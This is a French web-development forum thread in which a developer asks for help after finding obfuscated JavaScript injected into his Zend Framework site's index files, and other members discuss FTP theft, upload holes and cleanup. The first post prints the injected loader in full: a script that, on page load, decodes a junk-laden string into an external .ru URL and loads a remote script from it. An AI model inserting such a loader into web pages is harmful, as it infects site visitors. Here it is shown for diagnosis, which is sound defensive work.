IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Code pirate ajouté à l'index.php !?


Sujet :

Sécurité

  1. #1
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut Code pirate ajouté à l'index.php !?
    Hello à tous,

    Je développe un site avec ZF 1.9, et il y a eu un soucis sur le fichier index.php, du code a été ajouté je ne sais pas qui !!, voici :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    <script>/*GNU GPL*/ try{window.onload = function(){
    var Nhbk5v835x5dq6 = document.createElement('script');
    Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');
    Nhbk5v835x5dq6.setAttribute('id', 'myscript1');
    Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));
    Nhbk5v835x5dq6.setAttribute('defer', 'defer');
    document.body.appendChild(Nhbk5v835x5dq6);}}
    catch(e) {}</script>
    çà sent tres mauvais ce code là ... une idée sur ce problème ?
    Merci
    Fabrice

  2. #2
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Points : 44 155
    Points
    44 155
    Par défaut
    Si le fichier est modifié, il y a de fortes chances qu'un virus soit présent sur ton serveur.

  3. #3
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    Oui, le fichier a été modifié, et ce code n'est pas sur mon serveur mais chez un hébergeur privé (Linux).... Dois je en changer ?

    Fabrice

  4. #4
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Points : 44 155
    Points
    44 155
    Par défaut
    Le virus peut techniquement venir de plein de choses : une faille de sécurité sur le serveur en est une, on pourrait aussi imaginer un virus sur ton logiciel FTP par exemple.

  5. #5
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    Je ne crois pas, j'ai un anti-virus + firewall mise à jour quotidiennement, et c'est un fichier en dehors du repository, que j'exporte par la suite (pas ce fichier).

    Et l'erreur est apparue sans que j'intervienne.

    Fabrice

  6. #6
    Modérateur
    Avatar de grunk
    Homme Profil pro
    Lead dév - Architecte
    Inscrit en
    Août 2003
    Messages
    6 692
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 40
    Localisation : France, Côte d'Or (Bourgogne)

    Informations professionnelles :
    Activité : Lead dév - Architecte
    Secteur : Industrie

    Informations forums :
    Inscription : Août 2003
    Messages : 6 692
    Points : 20 241
    Points
    20 241
    Par défaut
    Plutôt qu'un virus , je pencherais plus pour un deface de ton site afin de récupérer les infos de tes visiteurs.
    Plusieurs cause possible :

    - Un acces ftp bateau genre toto/toto
    - Une faille quelconque sur ton site permettant à un pirate d'uploader un fichier et de l'executer
    - Une sécurité insuffisante sur ton pc , keylogger , libre accès à ta machine ...

    Un virus c'est quand même fort peu probable. D'une part un virus qui transiterais de windows à linux via un client ftp ca serait du jamais vu. Et d'autre part les virus ne vise généralement pas particumlièrement les pages web.

    Dans tous les cas tu es bon pour un check compelt de ton site, des logs si tu y a accès et de la config de ton serveur si tu es sur un serveur dédié.

  7. #7
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    ok,
    - le ftp a des chiffres et des lettres quelconque.
    - j'ai vérifié mon pc de fond en comble

    Donc, oui, y'a une faille je ne sais ou. Je n'ai pas acces au logs, mais le fai me dis que c'est ok (évidemment).

    Merci
    Fab.

  8. #8
    Expert confirmé
    Avatar de Thes32
    Homme Profil pro
    Développeur PHP, .Net, T-SQL
    Inscrit en
    Décembre 2006
    Messages
    2 379
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations professionnelles :
    Activité : Développeur PHP, .Net, T-SQL

    Informations forums :
    Inscription : Décembre 2006
    Messages : 2 379
    Points : 4 853
    Points
    4 853
    Par défaut
    Salut,

    tu devrais commencer par le signaler à ton Hébergeur puis voir si ça ne vient pas d'eux.

  9. #9
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    oui, je l'ai fait déjà, il me dis que tout va bien, dans les logs et tout et tout.

    F.

  10. #10
    Membre confirmé
    Profil pro
    Inscrit en
    Janvier 2007
    Messages
    466
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2007
    Messages : 466
    Points : 632
    Points
    632
    Par défaut
    Bonjour,

    Si ton hebergeur est free deja qu'il te dise que tout vas bien c'est assez etonnant, ensuite ton hebergeur ne controlera nullement l'integrité et le code source des tes script donc ne lui fait pas confiance, seul methode, reprendre ton code source.Module upload, traitrement des variables ...

    Bien cordialement

  11. #11
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    c un hebergeur privé.

    Pour le code, j'ai tout fait proprement, sans faille.

    - j'ai changé le ftp
    - les fichiers uploadé sont seulement des .jpg, et je filtre aussi la taille
    - je fais de url rewriting donc pas de soucis de changement d'id ou autres dans les get , etc
    - j'utilise uniquement ZF et phpThumbs (http://phpthumb.gxdlabs.com)

    Pour le FAI, j'en sais trop rien...

    Fabrice

  12. #12
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    la version de Zend est la derniere, en tout cas la 1.9. Celle de phpThumb aussi. Et php, php 5.2.x.

    Je viens de m'apercevoir que ce n'est pas seulement le fichier index.php, mais tous les index.phtml !!!

    F.

  13. #13
    Nouveau Candidat au Club
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    1
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 1
    Points : 1
    Points
    1
    Par défaut
    je viens de connaitre le même problème :
    modification, via ftp je suppose, des fichiers contenant le mot index.
    J'ai l'impression que le procédure a lieu quand je suis connecté en FTP sur le site sur lequel je bosse. Perso, j'utilise dream CSS4 comme client FTP.
    je pense que le script ajouté permet de récupérer l'url du site (l'accès FTP seul ne donnant pas l'information) et qu'ensuite d'autre appli sont installé.

    dans le script pour le paramètre src, en supprimant tous les caractères spéciaux on obtient une url :
    .....msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

  14. #14
    Membre habitué
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Points : 194
    Points
    194
    Par défaut
    Hello,

    Merci pour ces infos. Ce site ne me dis rien, surtout avec un .ru à la fin
    Ma foi, je vais vérifier tout çà... et voir si çà se reproduit.

    Fab

  15. #15
    Invité
    Invité(e)
    Par défaut
    Bonjour,
    Ce serait interessant que tu donnes même par MP si tu veux, l(URL de ton site, que ceux qui ont des techniques dans ce domaine aillent titiller la bête.

    Cela ne peut qu'étre util !

Discussions similaires

  1. Ajout de /index.php au nom de mon site
    Par Daniel63 dans le forum 1&1
    Réponses: 7
    Dernier message: 14/01/2015, 13h14
  2. Site piraté, ajout de code permanent
    Par Invité dans le forum jQuery
    Réponses: 12
    Dernier message: 03/05/2013, 16h58
  3. error 500 si je n'ajoute pas "/index.php"
    Par student_php dans le forum Apache
    Réponses: 1
    Dernier message: 16/07/2012, 21h20
  4. exécution des fichiers index.php
    Par berry dans le forum Apache
    Réponses: 4
    Dernier message: 20/12/2004, 20h29
  5. ajout d'index en cours d'utilisation
    Par jbat dans le forum MS SQL Server
    Réponses: 6
    Dernier message: 10/11/2003, 10h12

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo